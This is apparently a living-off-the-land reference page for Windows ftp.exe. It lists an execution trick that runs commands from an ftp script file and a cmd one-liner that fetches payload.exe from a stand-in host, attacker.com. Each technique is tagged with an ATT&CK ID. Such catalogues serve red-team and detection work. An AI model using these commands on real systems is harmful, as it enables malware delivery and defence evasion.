.. /Ftp.exe
Star

Execute
Download

A binary designed for connecting to FTP servers


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Executes the commands you put inside the text file.

    echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
    Use case
    Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
    Privileges required
    User
    Operating systems
    Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1202

Download

  1. Download

    cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
    Use case
    Spawn new process using ftp.exe. Ftp.exe downloads the binary.
    Privileges required
    User
    Operating systems
    Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1105